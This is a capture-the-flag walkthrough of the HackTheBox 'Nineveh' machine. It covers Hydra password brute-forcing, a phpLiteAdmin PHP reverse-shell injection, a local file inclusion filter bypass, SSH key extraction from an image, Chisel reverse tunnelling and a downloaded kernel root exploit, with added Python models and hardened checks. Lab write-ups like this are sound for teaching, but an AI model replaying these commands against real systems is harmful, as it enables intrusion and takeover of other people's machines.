HackTheBox: Nineveh

The first step was to run Nmap against the Nineveh machine:

# Nmap 7.91 scan initiated Thu Dec 31 08:51:45 2020 as: nmap -oN scan -sC -O -sV -p-
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 filtered ports
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.12 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%), Linux 4.2 (91%), Linux 4.4 (91%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 31 08:56:11 2020 -- 1 IP address (1 host up) scanned in 267.01 seconds

Both ports 80 and 443 appear to be open (everything else is reported as filtered, which matters later). I started by browsing to port 80 and was presented with a login page.

I ran Hydra against this login form to see if it had weak credentials:

└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=admin&password=^PASS^&Login=Login:invalid"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-31 09:45:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://^PASS^&Login=Login:invalid

[STATUS] 2618.00 tries/min, 2618 tries in 00:01h, 14341781 to do in 91:19h, 16 active
[80][http-post-form] host:   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-31 09:47:44

As you can see from the output, Hydra found the password 1q2w3e4r5t for the username admin using the RockYou wordlist. Note that the form module matches on the failure string "invalid", so any response without that word is treated as a hit; it is worth confirming a result by hand. I then logged into the admin panel.

The admin interface only contained a single page which included the following note:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.

This note was pulled from a text file stored on the webserver: the page URL contained the file name ninevehNotes.txt, so the page is including a file whose name comes from the request.

Because there was nothing more on this page for now, I moved on to the site hosted on port 443.

This site contains a single image. I ran GoBuster against it (with -k to ignore the expired certificate) and discovered the db directory:

└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt --url -k                                 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/01/03 10:33:22 Starting gobuster
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/db (Status: 301)
/server-status (Status: 403)
2021/01/03 10:34:22 Finished

Browsing to this directory brought me to a phpLiteAdmin 1.9 login form.

I then ran Hydra against this login form (it only takes a password, so -l admin is just a placeholder) and discovered that password123 was being used:

└─# hydra https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 10:55:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect

[443][http-post-form] host:   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-02 10:56:16

With this password I was able to log into the phpLiteAdmin web interface. phpLiteAdmin 1.9.x has a public remote PHP code injection exploit (Exploit-DB 24044): it lets you create a new database with a .php extension, and because SQLite writes cell contents into the database file verbatim, any PHP placed in a row is stored in a file that the web server will happily execute. I followed the instructions and created a database from the phpLiteAdmin web interface called test.php. I then opened the table, opened the insert tab and pasted in the code from /usr/share/webshells/php/php-reverse-shell.php, which ships with Kali, after changing the IP address in the script to my own (the script's default port, 1234, already matches the listener used below). I then inserted this as a row in the database.

Going back to the phpLiteAdmin front page shows that the database file (test.php) is stored at /var/tmp/test.php.
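To show why a SQLite database doubles as a PHP file, here is an added example (my own code, not part of the original writeup or of phpLiteAdmin). It builds a database named test.php the way phpLiteAdmin would, inserts a constructed stand-in payload instead of the reverse shell, and then models what PHP's include() does with the file: everything outside <?php ... ?> is echoed as raw bytes (the SQLite header and page padding) and everything inside is executed. It also includes a hardened name check of the kind the fix needs; the extension allowlist is my assumption, not phpLiteAdmin's own code.

```python
import os
import posixpath
import re
import shutil
import sqlite3
import tempfile

# Constructed stand-in for the pentestmonkey reverse shell: any PHP will do,
# the point is that it reaches the file byte-for-byte unchanged.
PAYLOAD = "<?php echo 'marker:' . php_uname(); ?>"


def build_php_database(path, payload=PAYLOAD):
    """Do on disk what phpLiteAdmin does when you create a database called
    test.php and insert one row. SQLite stores TEXT cells verbatim inside a
    page of the file, so the result is a valid database *and* a PHP source."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE notes (body TEXT)")
    conn.execute("INSERT INTO notes (body) VALUES (?)", (payload,))
    conn.commit()
    conn.close()
    return path


def is_sqlite_file(path):
    with open(path, "rb") as f:
        return f.read(16) == b"SQLite format 3\x00"


def php_include_segments(path):
    """Model of PHP include(): bytes outside <?php ... ?> are echoed as-is,
    bytes inside are executed. Returns [(kind, bytes), ...] so you can see
    the code survive the binary SQLite envelope around it."""
    with open(path, "rb") as f:
        data = f.read()
    segments, pos = [], 0
    while True:
        start = data.find(b"<?php", pos)
        if start == -1:
            segments.append(("echo", data[pos:]))
            return segments
        if start > pos:
            segments.append(("echo", data[pos:start]))
        end = data.find(b"?>", start)
        if end == -1:  # open tag with no close tag: the rest of the file is code
            segments.append(("exec", data[start + 5:].strip()))
            return segments
        segments.append(("exec", data[start + 5:end].strip()))
        pos = end + 2


def executed_code(path):
    """Just the PHP that include() would run."""
    return [code for kind, code in php_include_segments(path) if kind == "exec"]


def safe_database_name(name):
    """Hardened counterpart (assumed policy, not phpLiteAdmin's): the fix is
    not to scrub cell contents but to refuse any database name the web
    server could execute. Bare name, simple charset, data extension only;
    the stem may not contain a dot, so x.php.db is rejected as well."""
    if name != posixpath.basename(name):
        return False
    return re.fullmatch(r"[A-Za-z0-9_-]+\.(db|sqlite|sqlite3)", name) is not None


def demo():
    """Build test.php in a scratch directory and report what include() sees."""
    scratch = tempfile.mkdtemp()
    try:
        path = build_php_database(os.path.join(scratch, "test.php"))
        return is_sqlite_file(path), executed_code(path)
    finally:
        shutil.rmtree(scratch)


if __name__ == "__main__":
    valid_db, code = demo()
    print("valid SQLite file:", valid_db)
    print("PHP that include() would execute:", code)
```

Run it and the file starts with the SQLite magic yet still yields exactly one executable segment, which is the whole attack: the web server never asks whether a .php file is also a database.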

Now a way of executing this file is needed. I started a netcat listener on port 1234 to catch the reverse shell:

└─# nc -nvlp 1234        
listening on [any] 1234 ...

I went back to the page hosted on port 80 and changed the note path in the URL so that it pointed at /var/tmp/test.php instead of files/ninevehNotes.txt. This is a local file inclusion rather than plain directory traversal: the value is handed to PHP's include(), so a PHP file anywhere on disk is executed, not just read. I browsed to the following URL:

This did not work and kept reporting "No Note is selected". I did find, however, that if the string ninevehNotes appears in the filename then a different error is shown, which means the only check is a substring match on the parameter and the include() itself is still reached:

Warning:  include(files/ninevehNotes.tx): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31

Warning:  include(): Failed opening 'files/ninevehNotes.tx' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31

Because of this, I went back to the phpLiteAdmin interface and renamed the database to ninevehNotes.php, so that the path /var/tmp/ninevehNotes.php would pass the substring check. I then made a request to:

This worked successfully and a reverse shell was captured.

└─# nc -nvlp 1234        
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49624
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 08:35:53 up  3:36,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
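The filter bypass above comes down to one bad check. As an added example (my own code, not the machine's manage.php, whose source the writeup never shows), here is a Python model of that check beside a hardened version. The vulnerable function does what the page observed: substring match, then the value goes straight to include(). The hardened one takes a bare file name from an allowlist of characters, forces the .txt extension and re-anchors it under the notes directory taken from the include() warning. The probe list is constructed; the null-byte entry is the classic PHP truncation trick, included to show the allowlist also covers it.

```python
import posixpath
import re

# Directory the include() warnings on the page point at.
NOTES_DIR = "/var/www/html/department/files"


def vulnerable_note_path(value):
    """Model of the check the page ran into: the only test is that the
    substring 'ninevehNotes' occurs somewhere in the user-supplied value.
    Whatever passes is returned unchanged, i.e. handed to include()."""
    if "ninevehNotes" not in value:
        return None  # "No Note is selected"
    return value


def hardened_note_path(value, notes_dir=NOTES_DIR):
    """Allowlist version: a bare name with a simple charset and a fixed
    .txt extension, joined under notes_dir and checked to still be inside it."""
    if value != posixpath.basename(value):
        return None  # had a directory component
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.txt", value):
        return None  # wrong charset, wrong extension, or an embedded NUL
    full = posixpath.normpath(posixpath.join(notes_dir, value))
    if posixpath.commonpath([full, notes_dir]) != notes_dir:
        return None  # belt and braces: escaped the notes directory
    return full


# Constructed probes: the first three are the values the writeup tried.
PROBES = [
    "files/ninevehNotes.txt",        # the legitimate value
    "/var/tmp/test.php",             # first attempt: no substring, rejected
    "/var/tmp/ninevehNotes.php",     # the bypass: substring present
    "../../../../etc/passwd",        # plain traversal, no substring
    "ninevehNotes.txt\x00.php",      # historic null-byte truncation trick
]


def compare(probes=PROBES):
    """Map each probe to (what the vulnerable check lets through,
    what the hardened check lets through)."""
    return {p: (vulnerable_note_path(p), hardened_note_path(p)) for p in probes}


if __name__ == "__main__":
    for probe, (weak, strong) in compare().items():
        print(repr(probe), "->", weak, "|", strong)
```

The hardened check rejects even the page's own legitimate value, because the directory prefix files/ should never come from the client in the first place; the server knows where its notes live.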

Browsing around the machine over the reverse shell, I found a secure_notes directory at /var/www/ssl/secure_notes:

$ dir
index.html  nineveh.png
$ pwd

This page contains the following image:

I downloaded this image to the kali machine with wget and ran strings against it.

└─# strings nineveh.png  

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

As you can see from the output, an SSH key pair is embedded in the image. The line shown above is the public half (an ssh-rsa key with the comment amrois@nineveh.htb); the matching private key is embedded in the same file, and that is the part ssh needs. I extracted the private key and saved it as nin.pub for later. The name is misleading, since the file holds the private key, not the public one. Before relying on it, confirm the pair matches and that the permissions are tight: chmod 600 nin.pub (ssh refuses world-readable keys) and ssh-keygen -y -f nin.pub, which prints the public key derived from the private one and should match the ssh-rsa line above.
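To make the public-versus-private distinction concrete, here is an added example (my own code, not part of the original writeup). It decodes the ssh-rsa line exactly as strings printed it on this page, using only the OpenSSH wire format (a sequence of length-prefixed fields: key type, exponent, modulus), and triages a constructed strings dump into public key lines and PEM private key blocks. The PEM block in the sample is a made-up placeholder, not a real key.

```python
import base64
import struct

# Public key line exactly as strings printed it on this page (amrois's key).
PAGE_PUBKEY_LINE = (
    "ssh-rsa "
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxg"
    "BHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+Igf"
    "zUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbF"
    "cNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP"
    "68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbd"
    "Rv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7"
    "IETJzVNOrU0R"
    " amrois@nineveh.htb"
)

# Constructed strings output: PNG chunk names, the page's real public key,
# and a made-up, truncated PEM block standing in for the private key.
SAMPLE_STRINGS_OUTPUT = [
    "IHDR",
    "IDAT",
    PAGE_PUBKEY_LINE,
    "-----BEGIN RSA PRIVATE KEY-----",
    "MIIEogIBAAKCAQEAconstructedplaceholderbodynotarealkey",
    "-----END RSA PRIVATE KEY-----",
    "IEND",
]


def parse_ssh_public_key(line):
    """Decode an OpenSSH one-line public key. The base64 blob is a series of
    (uint32 big-endian length, bytes) fields; for ssh-rsa they are the type
    string, the public exponent e and the modulus n."""
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("not an OpenSSH public key line")
    blob = base64.b64decode(fields[1])
    items, off = [], 0
    while off < len(blob):
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        items.append(blob[off:off + length])
        off += length
    keytype = items[0].decode()
    if keytype != fields[0]:
        raise ValueError("prefix %r does not match encoded type %r" % (fields[0], keytype))
    if keytype != "ssh-rsa":
        raise ValueError("only ssh-rsa is handled here, got %s" % keytype)
    e = int.from_bytes(items[1], "big")
    n = int.from_bytes(items[2], "big")
    return {"type": keytype, "e": e, "bits": n.bit_length(),
            "comment": fields[2] if len(fields) > 2 else ""}


def public_key_lines(lines):
    """Single-line public keys as written to authorized_keys / .pub files."""
    prefixes = ("ssh-rsa ", "ssh-ed25519 ", "ecdsa-sha2-")
    return [l.strip() for l in lines if l.strip().startswith(prefixes)]


def extract_private_key_blocks(lines):
    """Private keys only ever appear as PEM blocks; collect each one from its
    BEGIN header to its END footer inclusive."""
    blocks, current = [], None
    for raw in lines:
        line = raw.strip()
        if current is None:
            if line.startswith("-----BEGIN ") and line.endswith("PRIVATE KEY-----"):
                current = [line]
        else:
            current.append(line)
            if line.startswith("-----END ") and line.endswith("PRIVATE KEY-----"):
                blocks.append("\n".join(current))
                current = None
    return blocks


def triage(lines):
    """What a strings dump actually gave you: parsed public keys and raw
    private key blocks. A dump with public keys only cannot log you in."""
    return {"public": [parse_ssh_public_key(l) for l in public_key_lines(lines)],
            "private_blocks": extract_private_key_blocks(lines)}


if __name__ == "__main__":
    result = triage(SAMPLE_STRINGS_OUTPUT)
    for key in result["public"]:
        print("public key:", key)
    print("private key blocks found:", len(result["private_blocks"]))
```

Parsing the page's line gives a 2048-bit ssh-rsa key with e = 65537 and the comment amrois@nineveh.htb, which is the username the later SSH login uses.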

I next did some more investigation through the reverse shell and found that the machine was listening on port 22, even though the initial Nmap scan had reported that port as filtered: SSH is running, but a host firewall is dropping inbound connections to it from the outside.

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0    *               LISTEN      off (0.00/0/0)
tcp        0      0    *               LISTEN      off (0.00/0/0)
tcp        0      0   *               LISTEN      off (0.00/0/0)
tcp        0      0        ESTABLISHED off (0.00/0/0)
tcp        0      0       TIME_WAIT   timewait (51.58/0/0)
tcp        0      0       ESTABLISHED keepalive (7203.23/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0              ESTABLISHED off (0.00/0/0)
udp        0      0              ESTABLISHED off (0.00/0/0)
Active UNIX domain sockets (servers and established)

I decided to forward this port to my Kali machine so that it could be reached and logged into with the private key extracted earlier. I started a Chisel server on Kali with reverse tunnelling enabled:

└─# ./chisel_1.7.3_linux_amd64 server -p 2700 -reverse -v
2021/01/03 09:36:34 server: Reverse tunnelling enabled
2021/01/03 09:36:34 server: Fingerprint +Vgh/6RQNjjkwJCxTcS9GahcQIIBe9BrBOVhaMH9gZs=
2021/01/03 09:36:34 server: Listening on

I then downloaded the Chisel client to the Nineveh machine and ran it so that the target's port 22 was reverse-forwarded to port 2800 on my Kali machine:

$ ./chisel_1.7.3_linux_amd64 client R:2800:
2021/01/03 08:36:14 client: Connecting to ws://
2021/01/03 08:36:40 client: Connected (Latency 26.49034ms)

I then logged into the forwarded SSH port from Kali using the nin.pub private key extracted earlier:

└─# ssh -i nin.pub amrois@ -p 2800
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

287 packages can be updated.
206 updates are security updates.

You have mail.
Last login: Mon Jul  3 00:19:59 2017 from
amrois@nineveh:~$ ls
amrois@nineveh:~$ cat user.txt 

As you can see, this was successful and I was able to capture the user flag. The next step was to escalate privileges. Running "uname -r" identified the kernel as 4.4.0-62-generic (Ubuntu 16.04.2, per the login banner), for which a public local privilege escalation exploit exists; the task_struct / uidptr / "spawning root shell" output below is that of the eBPF verifier exploit for CVE-2017-16995 (Exploit-DB 44298), which affects Ubuntu 16.04 kernels before 4.4.0-116. I downloaded a precompiled copy of the exploit to the Nineveh machine (saved as comp) and ran it. A kernel exploit is the last resort on a real engagement, since a failed attempt can panic the host, so check the exact kernel build first and test on a matching VM where possible.

amrois@nineveh:/tmp$ wget
--2021-01-03 09:21:39--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘comp’

comp                                                       100%[=======================================================================================================================================>]  17.46K  --.-KB/s    in 0.02s   

2021-01-03 09:21:39 (728 KB/s) - ‘comp’ saved [17880/17880]

amrois@nineveh:/tmp$ chmod +x comp
amrois@nineveh:/tmp$ ./comp
task_struct = ffff880039eb3800
uidptr = ffff88003c7f6d84
spawning root shell

root@nineveh:/tmp# cd /root/

root@nineveh:/root# cd Desktop

root@nineveh:/root# ls
root.txt  test.txt  vulnScan.sh

root@nineveh:/root# cat root.txt

As you can see from the output, this exploit was successful and I was able to capture the root flag.
